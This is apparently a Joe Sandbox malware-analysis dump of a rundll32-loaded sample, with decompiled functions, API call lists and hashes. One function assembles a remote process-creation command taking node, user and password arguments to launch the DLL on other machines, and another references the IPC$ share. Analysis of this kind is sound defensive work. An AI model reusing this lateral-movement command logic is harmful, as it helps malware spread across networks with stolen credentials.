                                                                                                                                                              0x04e24cf0
                                                                                                                                                              0x04e24cf7
                                                                                                                                                              0x04e24cfa
                                                                                                                                                              0x04e24cfc
                                                                                                                                                              0x04e24cfc
                                                                                                                                                              0x04e24cff
                                                                                                                                                              0x04e24cff
                                                                                                                                                              0x04e24d01
                                                                                                                                                              0x04e24d02
                                                                                                                                                              0x04e24d0d
                                                                                                                                                              0x04e24d11
                                                                                                                                                              0x04e24d14
                                                                                                                                                              0x04e24d16
                                                                                                                                                              0x04e24d16
                                                                                                                                                              0x04e24d19
                                                                                                                                                              0x04e24d19
                                                                                                                                                              0x04e24d1b
                                                                                                                                                              0x04e24d1c
                                                                                                                                                              0x04e24d24
                                                                                                                                                              0x04e24d2b
                                                                                                                                                              0x04e24d2e
                                                                                                                                                              0x04e24d30
                                                                                                                                                              0x04e24d32
                                                                                                                                                              0x04e24d32
                                                                                                                                                              0x04e24d35
                                                                                                                                                              0x04e24d35
                                                                                                                                                              0x04e24d37
                                                                                                                                                              0x04e24d38
                                                                                                                                                              0x04e24d3e
                                                                                                                                                              0x04e24d40
                                                                                                                                                              0x04e24d42
                                                                                                                                                              0x04e24d49
                                                                                                                                                              0x04e24d4d
                                                                                                                                                              0x04e24d50
                                                                                                                                                              0x04e24d52
                                                                                                                                                              0x04e24d54
                                                                                                                                                              0x04e24d54
                                                                                                                                                              0x04e24d57
                                                                                                                                                              0x04e24d57
                                                                                                                                                              0x04e24d59
                                                                                                                                                              0x04e24d5a
                                                                                                                                                              0x04e24d5e
                                                                                                                                                              0x04e24d63
                                                                                                                                                              0x04e24d42
                                                                                                                                                              0x04e24d67
                                                                                                                                                              0x04e24d6f
                                                                                                                                                              0x04e24d74
                                                                                                                                                              0x04e24d7a
                                                                                                                                                              0x04e24d7a
                                                                                                                                                              0x04e24d7d
                                                                                                                                                              0x04e24d82
                                                                                                                                                              0x04e24d82
                                                                                                                                                              0x04e24d8a
                                                                                                                                                              0x04e24d8e
                                                                                                                                                              0x04e24d91
                                                                                                                                                              0x04e24d9c
                                                                                                                                                              0x04e24da0
                                                                                                                                                              0x04e24dab
                                                                                                                                                              0x04e24daf
                                                                                                                                                              0x04e24db6
                                                                                                                                                              0x04e24db8
                                                                                                                                                              0x04e24dbb
                                                                                                                                                              0x04e24dbb
                                                                                                                                                              0x04e24dbd
                                                                                                                                                              0x04e24dbe
                                                                                                                                                              0x04e24dc9
                                                                                                                                                              0x04e24dcd
                                                                                                                                                              0x04e24dd0
                                                                                                                                                              0x04e24dd2
                                                                                                                                                              0x04e24dd5
                                                                                                                                                              0x04e24dd5
                                                                                                                                                              0x04e24dd7
                                                                                                                                                              0x04e24dd8
                                                                                                                                                              0x04e24de0
                                                                                                                                                              0x04e24de7
                                                                                                                                                              0x04e24dea
                                                                                                                                                              0x04e24dec
                                                                                                                                                              0x04e24dee
                                                                                                                                                              0x04e24df1
                                                                                                                                                              0x04e24df1
                                                                                                                                                              0x04e24df3
                                                                                                                                                              0x04e24df4
                                                                                                                                                              0x04e24dfa
                                                                                                                                                              0x04e24dfc
                                                                                                                                                              0x04e24dfe
                                                                                                                                                              0x04e24e05
                                                                                                                                                              0x04e24e09
                                                                                                                                                              0x04e24e0c
                                                                                                                                                              0x04e24e0e
                                                                                                                                                              0x04e24e10
                                                                                                                                                              0x04e24e13
                                                                                                                                                              0x04e24e13
                                                                                                                                                              0x04e24e15
                                                                                                                                                              0x04e24e16
                                                                                                                                                              0x04e24e1a
                                                                                                                                                              0x04e24e1f
                                                                                                                                                              0x04e24dfe
                                                                                                                                                              0x04e24e23
                                                                                                                                                              0x04e24e2b
                                                                                                                                                              0x04e24e30
                                                                                                                                                              0x04e24e36
                                                                                                                                                              0x04e24e36
                                                                                                                                                              0x04e24e39
                                                                                                                                                              0x04e24e3e
                                                                                                                                                              0x04e24e3e
                                                                                                                                                              0x04e24e48
                                                                                                                                                              0x04e24e4b
                                                                                                                                                              0x04e24e4e
                                                                                                                                                              0x04e24e52
                                                                                                                                                              0x04e24e52
                                                                                                                                                              0x04e24e5d

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,74654F20,77794DB0,00000000,?,00000000,00000000,00000000), ref: 04E24C14
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E24C1B
                                                                                                                                                              • rand.MSVCRT ref: 04E24CE6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocProcessrand
                                                                                                                                                              • String ID: Oet Uet0Xet$8
                                                                                                                                                              • API String ID: 1878709018-91176900
                                                                                                                                                              • Opcode ID: ad6142c4e7036fec7372623cc604a5a03c9ac407fab8f58c6ba647f6c1063c90
                                                                                                                                                              • Instruction ID: bebc6c064f87c909dc7cfe65b322c54f0633d558478017108ce62085fba48799
                                                                                                                                                              • Opcode Fuzzy Hash: ad6142c4e7036fec7372623cc604a5a03c9ac407fab8f58c6ba647f6c1063c90
                                                                                                                                                              • Instruction Fuzzy Hash: 42B12531A042669FCB168F6CC5642F97FF1EF06318F2591D9E8C5EB281DA35E64AC740
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E24E60(intOrPtr _a4, void* _a8, short _a12) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				signed int _v16;
                                                                                                                                                              				void* _t27;
                                                                                                                                                              				short _t29;
                                                                                                                                                              				signed char* _t31;
                                                                                                                                                              				void* _t38;
                                                                                                                                                              				signed char _t45;
                                                                                                                                                              				signed int* _t51;
                                                                                                                                                              				void* _t53;
                                                                                                                                                              				intOrPtr _t54;
                                                                                                                                                              				void* _t57;
                                                                                                                                                              
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_t27 = HeapAlloc(GetProcessHeap(), 8, 0x48);
                                                                                                                                                              				_t57 = _t27;
                                                                                                                                                              				if(_t57 == 0) {
                                                                                                                                                              					L11:
                                                                                                                                                              					return _v5;
                                                                                                                                                              				}
                                                                                                                                                              				_t53 = 0x10;
                                                                                                                                                              				do {
                                                                                                                                                              					 *_t27 =  !( *(0x4e33730 + _t27));
                                                                                                                                                              					_t27 = _t27 + 1;
                                                                                                                                                              					_t53 = _t53 - 1;
                                                                                                                                                              				} while (_t53 != 0);
                                                                                                                                                              				_t29 = 0x48;
                                                                                                                                                              				 *((short*)(_t57 + 8)) = _t29;
                                                                                                                                                              				 *((short*)(_t57 + 0x10)) = 0x10b8;
                                                                                                                                                              				 *((short*)(_t57 + 0x12)) = 0x10b8;
                                                                                                                                                              				 *((char*)(_t57 + 2)) = 0xb;
                                                                                                                                                              				_t51 = 0x4e33700;
                                                                                                                                                              				_t7 = _t57 + 0x18; // 0x18
                                                                                                                                                              				_t31 = _t7;
                                                                                                                                                              				_t54 = 0x30;
                                                                                                                                                              				do {
                                                                                                                                                              					_t45 =  !( *_t51);
                                                                                                                                                              					_t51 =  &(_t51[0]);
                                                                                                                                                              					 *_t31 = _t45;
                                                                                                                                                              					_t31 =  &(_t31[1]);
                                                                                                                                                              					_t54 = _t54 - 1;
                                                                                                                                                              				} while (_t54 != 0);
                                                                                                                                                              				if(E04E22F5A(_a4, _a8, _a12, _t54, 0xff, 8, _t57, 0x48) != 0) {
                                                                                                                                                              					_v16 = _v16 & 0x00000000;
                                                                                                                                                              					_v12 = _v12 & 0x00000000;
                                                                                                                                                              					if(E04E23071(_t51, _a4, _a8, _a12,  &_v12,  &_v16) != 0) {
                                                                                                                                                              						_t38 = _v12;
                                                                                                                                                              						if(0 ==  *((intOrPtr*)(_t38 + _v16 - 0x18))) {
                                                                                                                                                              							_v5 = 1;
                                                                                                                                                              						}
                                                                                                                                                              						HeapFree(GetProcessHeap(), 8, _t38);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				HeapFree(GetProcessHeap(), 8, _t57);
                                                                                                                                                              				goto L11;
                                                                                                                                                              			}















                                                                                                                                                              0x04e24e72
                                                                                                                                                              0x04e24e79
                                                                                                                                                              0x04e24e7f
                                                                                                                                                              0x04e24e83
                                                                                                                                                              0x04e24f38
                                                                                                                                                              0x04e24f3e
                                                                                                                                                              0x04e24f3e
                                                                                                                                                              0x04e24e90
                                                                                                                                                              0x04e24e94
                                                                                                                                                              0x04e24e99
                                                                                                                                                              0x04e24e9b
                                                                                                                                                              0x04e24e9c
                                                                                                                                                              0x04e24e9c
                                                                                                                                                              0x04e24ea1
                                                                                                                                                              0x04e24ea2
                                                                                                                                                              0x04e24eaf
                                                                                                                                                              0x04e24eb3
                                                                                                                                                              0x04e24eb7
                                                                                                                                                              0x04e24ebb
                                                                                                                                                              0x04e24ec0
                                                                                                                                                              0x04e24ec0
                                                                                                                                                              0x04e24ec3
                                                                                                                                                              0x04e24ec4
                                                                                                                                                              0x04e24ec6
                                                                                                                                                              0x04e24ec8
                                                                                                                                                              0x04e24ec9
                                                                                                                                                              0x04e24ecb
                                                                                                                                                              0x04e24ecc
                                                                                                                                                              0x04e24ecc
                                                                                                                                                              0x04e24ef0
                                                                                                                                                              0x04e24ef2
                                                                                                                                                              0x04e24ef6
                                                                                                                                                              0x04e24f12
                                                                                                                                                              0x04e24f14
                                                                                                                                                              0x04e24f21
                                                                                                                                                              0x04e24f23
                                                                                                                                                              0x04e24f23
                                                                                                                                                              0x04e24f2d
                                                                                                                                                              0x04e24f2d
                                                                                                                                                              0x04e24f12
                                                                                                                                                              0x04e24f35
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 04E24E76
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E24E79
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04E24F2A
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E24F2D
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 04E24F32
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E24F35
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$Free$Alloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3689955550-0
                                                                                                                                                              • Opcode ID: ad73450fee77a60e85eeb54f27fad945e914c587c0c52b1601dd8aff13ce4e19
                                                                                                                                                              • Instruction ID: 881fce59e169c33cc50d00d2a11f7f9356082d059444fee3b4b0123561d34fb9
                                                                                                                                                              • Opcode Fuzzy Hash: ad73450fee77a60e85eeb54f27fad945e914c587c0c52b1601dd8aff13ce4e19
                                                                                                                                                              • Instruction Fuzzy Hash: 4A2134316803447AFB219F61CD04FAF7F78EF95719F009048F689AB2D0DA75A809C760
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E2641A(char* _a4) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				short* _v12;
                                                                                                                                                              				int _t7;
                                                                                                                                                              				short* _t11;
                                                                                                                                                              				int _t12;
                                                                                                                                                              				short* _t13;
                                                                                                                                                              
                                                                                                                                                              				_t7 = MultiByteToWideChar(0xfde9, 0, _a4, 0xffffffff, 0, 0);
                                                                                                                                                              				_v8 = _t7;
                                                                                                                                                              				if(_t7 == 0) {
                                                                                                                                                              					L3:
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				_t11 = HeapAlloc(GetProcessHeap(), 0, _t7 + _t7);
                                                                                                                                                              				_v12 = _t11;
                                                                                                                                                              				if(_t11 == 0) {
                                                                                                                                                              					goto L3;
                                                                                                                                                              				}
                                                                                                                                                              				_t12 = MultiByteToWideChar(0xfde9, 0, _a4, 0xffffffff, _t11, _v8);
                                                                                                                                                              				_t13 = _v12;
                                                                                                                                                              				if(_t12 == 0) {
                                                                                                                                                              					goto L3;
                                                                                                                                                              				}
                                                                                                                                                              				return _t13;
                                                                                                                                                              			}









                                                                                                                                                              0x04e26439
                                                                                                                                                              0x04e2643b
                                                                                                                                                              0x04e26440
                                                                                                                                                              0x04e2646e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2646e
                                                                                                                                                              0x04e2644d
                                                                                                                                                              0x04e26453
                                                                                                                                                              0x04e26458
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e26465
                                                                                                                                                              0x04e26469
                                                                                                                                                              0x04e2646c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e26474

                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,04E28E53,000000FF,00000000,00000000,00000000,00000000,77974AB0,?,04E28E53,00000000), ref: 04E26439
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,04E28E53,00000000), ref: 04E26446
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,04E28E53,00000000), ref: 04E2644D
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,04E28E53,000000FF,00000000,00000000,?,04E28E53,00000000), ref: 04E26465
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharHeapMultiWide$AllocProcess
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 1432973188-3175316637
                                                                                                                                                              • Opcode ID: 40f45f36e83a5e50dc8dc6fc45390ea7dc251e53e85949c58b791ba3837c5411
                                                                                                                                                              • Instruction ID: 3f9e7db72fab784b6c61ce6ce7166803d0014750f34b7feebad950b669d9f79f
                                                                                                                                                              • Opcode Fuzzy Hash: 40f45f36e83a5e50dc8dc6fc45390ea7dc251e53e85949c58b791ba3837c5411
                                                                                                                                                              • Instruction Fuzzy Hash: 20F096B6A04118BFEB016FB49EC4C7F7BBCEB452687100235FA11E2184D134DD0057B0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E04E29972(WCHAR* __ebx, void* __eflags, intOrPtr _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                              				short _v8;
                                                                                                                                                              				short _v10;
                                                                                                                                                              				short _v12;
                                                                                                                                                              				short _v14;
                                                                                                                                                              				short _v16;
                                                                                                                                                              				short _v18;
                                                                                                                                                              				short _v20;
                                                                                                                                                              				short _v22;
                                                                                                                                                              				short _v24;
                                                                                                                                                              				short _v26;
                                                                                                                                                              				short _v28;
                                                                                                                                                              				short _v30;
                                                                                                                                                              				short _v32;
                                                                                                                                                              				short _v34;
                                                                                                                                                              				short _v36;
                                                                                                                                                              				short _v38;
                                                                                                                                                              				short _v40;
                                                                                                                                                              				short _v42;
                                                                                                                                                              				short _v44;
                                                                                                                                                              				short _v46;
                                                                                                                                                              				short _v48;
                                                                                                                                                              				short _v50;
                                                                                                                                                              				short _v52;
                                                                                                                                                              				short _v54;
                                                                                                                                                              				short _v56;
                                                                                                                                                              				short _v58;
                                                                                                                                                              				short _v60;
                                                                                                                                                              				short _v62;
                                                                                                                                                              				short _v64;
                                                                                                                                                              				short _v66;
                                                                                                                                                              				short _v68;
                                                                                                                                                              				short _v70;
                                                                                                                                                              				short _v72;
                                                                                                                                                              				short _v74;
                                                                                                                                                              				short _v76;
                                                                                                                                                              				short _v78;
                                                                                                                                                              				short _v80;
                                                                                                                                                              				short _v82;
                                                                                                                                                              				short _v84;
                                                                                                                                                              				short _v86;
                                                                                                                                                              				short _v88;
                                                                                                                                                              				short _v608;
                                                                                                                                                              				char _v1128;
                                                                                                                                                              				char _v17512;
                                                                                                                                                              				short _t72;
                                                                                                                                                              				short _t73;
                                                                                                                                                              				short _t74;
                                                                                                                                                              				short _t75;
                                                                                                                                                              				short _t76;
                                                                                                                                                              				short _t77;
                                                                                                                                                              				short _t79;
                                                                                                                                                              				short _t81;
                                                                                                                                                              				short _t82;
                                                                                                                                                              				signed int _t86;
                                                                                                                                                              				short _t91;
                                                                                                                                                              				WCHAR* _t96;
                                                                                                                                                              				short _t97;
                                                                                                                                                              				void* _t98;
                                                                                                                                                              				void _t99;
                                                                                                                                                              				signed int _t100;
                                                                                                                                                              				signed short* _t104;
                                                                                                                                                              				short _t107;
                                                                                                                                                              				signed int _t108;
                                                                                                                                                              				short _t109;
                                                                                                                                                              				void* _t112;
                                                                                                                                                              				short _t119;
                                                                                                                                                              				short _t120;
                                                                                                                                                              				short _t121;
                                                                                                                                                              				short _t123;
                                                                                                                                                              				short _t124;
                                                                                                                                                              				short _t125;
                                                                                                                                                              				short _t127;
                                                                                                                                                              				short _t131;
                                                                                                                                                              				short _t132;
                                                                                                                                                              				short _t133;
                                                                                                                                                              				short _t134;
                                                                                                                                                              				short _t135;
                                                                                                                                                              				short _t137;
                                                                                                                                                              				short _t138;
                                                                                                                                                              				short _t139;
                                                                                                                                                              				short _t140;
                                                                                                                                                              				short _t142;
                                                                                                                                                              				signed int _t145;
                                                                                                                                                              				void* _t146;
                                                                                                                                                              
                                                                                                                                                              				_t96 = __ebx;
                                                                                                                                                              				E04E2A760(0x4464);
                                                                                                                                                              				 *__ebx = 0;
                                                                                                                                                              				E04E288D3( &_v1128);
                                                                                                                                                              				_t72 = 0x2f;
                                                                                                                                                              				_v88 = _t72;
                                                                                                                                                              				_t73 = 0x6e;
                                                                                                                                                              				_v86 = _t73;
                                                                                                                                                              				_t74 = 0x6f;
                                                                                                                                                              				_v84 = _t74;
                                                                                                                                                              				_t75 = 0x64;
                                                                                                                                                              				_v82 = _t75;
                                                                                                                                                              				_t76 = 0x65;
                                                                                                                                                              				_v80 = _t76;
                                                                                                                                                              				_t77 = 0x3a;
                                                                                                                                                              				_t97 = 0x22;
                                                                                                                                                              				_v78 = _t77;
                                                                                                                                                              				_v76 = _t97;
                                                                                                                                                              				_t79 = 0x25;
                                                                                                                                                              				_t107 = 0x77;
                                                                                                                                                              				_v74 = _t79;
                                                                                                                                                              				_v72 = _t107;
                                                                                                                                                              				_t81 = 0x73;
                                                                                                                                                              				_v70 = _t81;
                                                                                                                                                              				_v68 = _t97;
                                                                                                                                                              				_t119 = 0x20;
                                                                                                                                                              				_v66 = _t119;
                                                                                                                                                              				_t120 = 0x2f;
                                                                                                                                                              				_v64 = _t120;
                                                                                                                                                              				_t121 = 0x75;
                                                                                                                                                              				_v62 = _t121;
                                                                                                                                                              				_v60 = _t81;
                                                                                                                                                              				_t123 = 0x65;
                                                                                                                                                              				_v58 = _t123;
                                                                                                                                                              				_t124 = 0x72;
                                                                                                                                                              				_v56 = _t124;
                                                                                                                                                              				_t125 = 0x3a;
                                                                                                                                                              				_v54 = _t125;
                                                                                                                                                              				_v52 = _t97;
                                                                                                                                                              				_t127 = 0x25;
                                                                                                                                                              				_v50 = _t127;
                                                                                                                                                              				_v48 = _t107;
                                                                                                                                                              				_v46 = _t81;
                                                                                                                                                              				_v44 = _t97;
                                                                                                                                                              				_t131 = 0x20;
                                                                                                                                                              				_v42 = _t131;
                                                                                                                                                              				_t132 = 0x2f;
                                                                                                                                                              				_v40 = _t132;
                                                                                                                                                              				_t133 = 0x70;
                                                                                                                                                              				_v38 = _t133;
                                                                                                                                                              				_t134 = 0x61;
                                                                                                                                                              				_v36 = _t134;
                                                                                                                                                              				_t135 = _t81;
                                                                                                                                                              				_v34 = _t135;
                                                                                                                                                              				_v32 = _t135;
                                                                                                                                                              				_v30 = _t107;
                                                                                                                                                              				_t137 = 0x6f;
                                                                                                                                                              				_v28 = _t137;
                                                                                                                                                              				_t138 = 0x72;
                                                                                                                                                              				_v26 = _t138;
                                                                                                                                                              				_t139 = 0x64;
                                                                                                                                                              				_v24 = _t139;
                                                                                                                                                              				_t140 = 0x3a;
                                                                                                                                                              				_v22 = _t140;
                                                                                                                                                              				_v20 = _t97;
                                                                                                                                                              				_t142 = 0x25;
                                                                                                                                                              				_v14 = _t81;
                                                                                                                                                              				_t82 = 0x20;
                                                                                                                                                              				_v10 = _t82;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v18 = _t142;
                                                                                                                                                              				_v16 = _t107;
                                                                                                                                                              				_v12 = _t97;
                                                                                                                                                              				_a12 = wsprintfW(__ebx,  &_v88, _a4, _a8, _a12);
                                                                                                                                                              				_t98 = 0;
                                                                                                                                                              				do {
                                                                                                                                                              					_t48 = _t98 + L"process call create \"C:\\Windows\\System32\\rundll32.exe"; // 0x720070
                                                                                                                                                              					_t108 =  *_t48 & 0x0000ffff;
                                                                                                                                                              					 *(_t146 + _t98 - 0x25c) = _t108;
                                                                                                                                                              					_t98 = _t98 + 2;
                                                                                                                                                              				} while (_t108 != 0);
                                                                                                                                                              				_t112 =  &_v608 - 2;
                                                                                                                                                              				do {
                                                                                                                                                              					_t99 =  *(_t112 + 2);
                                                                                                                                                              					_t112 = _t112 + 2;
                                                                                                                                                              				} while (_t99 != 0);
                                                                                                                                                              				_t100 = 0xb;
                                                                                                                                                              				_t86 = memcpy(_t112, L" \\\"C:\\Windows\\%s\\\" #1 ", _t100 << 2);
                                                                                                                                                              				asm("movsw");
                                                                                                                                                              				_t145 = _a12 + wsprintfW( &(__ebx[_t86]),  &_v608,  &_v1128);
                                                                                                                                                              				E04E26735( &_v17512, 0x1fff);
                                                                                                                                                              				_t104 =  &_v17512;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t91 =  *_t104 & 0x0000ffff;
                                                                                                                                                              					if(_t91 == 0x22) {
                                                                                                                                                              						_t109 = 0x5c;
                                                                                                                                                              						_t96[_t145] = _t109;
                                                                                                                                                              						_t145 = _t145 + 1;
                                                                                                                                                              					}
                                                                                                                                                              					_t96[_t145] = _t91;
                                                                                                                                                              					if(_t91 == 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t104 =  &(_t104[1]);
                                                                                                                                                              					_t145 = _t145 + 1;
                                                                                                                                                              				}
                                                                                                                                                              				wsprintfW( &(_t96[_t145]), "\"");
                                                                                                                                                              				return 1;
                                                                                                                                                              			}























































































                                                                                                                                                              0x04e29972
                                                                                                                                                              0x04e2997a
                                                                                                                                                              0x04e29982
                                                                                                                                                              0x04e2998d
                                                                                                                                                              0x04e29994
                                                                                                                                                              0x04e29997
                                                                                                                                                              0x04e2999b
                                                                                                                                                              0x04e2999e
                                                                                                                                                              0x04e299a2
                                                                                                                                                              0x04e299a5
                                                                                                                                                              0x04e299a9
                                                                                                                                                              0x04e299ac
                                                                                                                                                              0x04e299b0
                                                                                                                                                              0x04e299b3
                                                                                                                                                              0x04e299b7
                                                                                                                                                              0x04e299ba
                                                                                                                                                              0x04e299bd
                                                                                                                                                              0x04e299c3
                                                                                                                                                              0x04e299c7
                                                                                                                                                              0x04e299ca
                                                                                                                                                              0x04e299cd
                                                                                                                                                              0x04e299d3
                                                                                                                                                              0x04e299d7
                                                                                                                                                              0x04e299dc
                                                                                                                                                              0x04e299e2
                                                                                                                                                              0x04e299e6
                                                                                                                                                              0x04e299e9
                                                                                                                                                              0x04e299ed
                                                                                                                                                              0x04e299f0
                                                                                                                                                              0x04e299f4
                                                                                                                                                              0x04e299f5
                                                                                                                                                              0x04e299fd
                                                                                                                                                              0x04e29a01
                                                                                                                                                              0x04e29a04
                                                                                                                                                              0x04e29a08
                                                                                                                                                              0x04e29a09
                                                                                                                                                              0x04e29a0f
                                                                                                                                                              0x04e29a10
                                                                                                                                                              0x04e29a18
                                                                                                                                                              0x04e29a1c
                                                                                                                                                              0x04e29a1d
                                                                                                                                                              0x04e29a23
                                                                                                                                                              0x04e29a29
                                                                                                                                                              0x04e29a31
                                                                                                                                                              0x04e29a35
                                                                                                                                                              0x04e29a38
                                                                                                                                                              0x04e29a3c
                                                                                                                                                              0x04e29a3d
                                                                                                                                                              0x04e29a43
                                                                                                                                                              0x04e29a46
                                                                                                                                                              0x04e29a4a
                                                                                                                                                              0x04e29a4d
                                                                                                                                                              0x04e29a51
                                                                                                                                                              0x04e29a53
                                                                                                                                                              0x04e29a57
                                                                                                                                                              0x04e29a5d
                                                                                                                                                              0x04e29a61
                                                                                                                                                              0x04e29a64
                                                                                                                                                              0x04e29a68
                                                                                                                                                              0x04e29a6b
                                                                                                                                                              0x04e29a6f
                                                                                                                                                              0x04e29a72
                                                                                                                                                              0x04e29a76
                                                                                                                                                              0x04e29a79
                                                                                                                                                              0x04e29a7f
                                                                                                                                                              0x04e29a83
                                                                                                                                                              0x04e29a86
                                                                                                                                                              0x04e29a8a
                                                                                                                                                              0x04e29a8e
                                                                                                                                                              0x04e29a9a
                                                                                                                                                              0x04e29aa3
                                                                                                                                                              0x04e29aa7
                                                                                                                                                              0x04e29aab
                                                                                                                                                              0x04e29ab8
                                                                                                                                                              0x04e29abb
                                                                                                                                                              0x04e29abd
                                                                                                                                                              0x04e29abd
                                                                                                                                                              0x04e29abd
                                                                                                                                                              0x04e29ac4
                                                                                                                                                              0x04e29acc
                                                                                                                                                              0x04e29acf
                                                                                                                                                              0x04e29ada
                                                                                                                                                              0x04e29add
                                                                                                                                                              0x04e29add
                                                                                                                                                              0x04e29ae1
                                                                                                                                                              0x04e29ae4
                                                                                                                                                              0x04e29aeb
                                                                                                                                                              0x04e29af1
                                                                                                                                                              0x04e29b04
                                                                                                                                                              0x04e29b15
                                                                                                                                                              0x04e29b23
                                                                                                                                                              0x04e29b28
                                                                                                                                                              0x04e29b2e
                                                                                                                                                              0x04e29b2e
                                                                                                                                                              0x04e29b34
                                                                                                                                                              0x04e29b38
                                                                                                                                                              0x04e29b39
                                                                                                                                                              0x04e29b3d
                                                                                                                                                              0x04e29b3d
                                                                                                                                                              0x04e29b3e
                                                                                                                                                              0x04e29b45
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29b47
                                                                                                                                                              0x04e29b4a
                                                                                                                                                              0x04e29b4a
                                                                                                                                                              0x04e29b56
                                                                                                                                                              0x04e29b60

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 04E288D3: PathFindFileNameW.SHLWAPI(04E37BC8,76B5C0B0,?,04E295B2), ref: 04E288E3
                                                                                                                                                              • wsprintfW.USER32 ref: 04E29AAF
                                                                                                                                                              • wsprintfW.USER32 ref: 04E29B0D
                                                                                                                                                              • wsprintfW.USER32 ref: 04E29B56
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
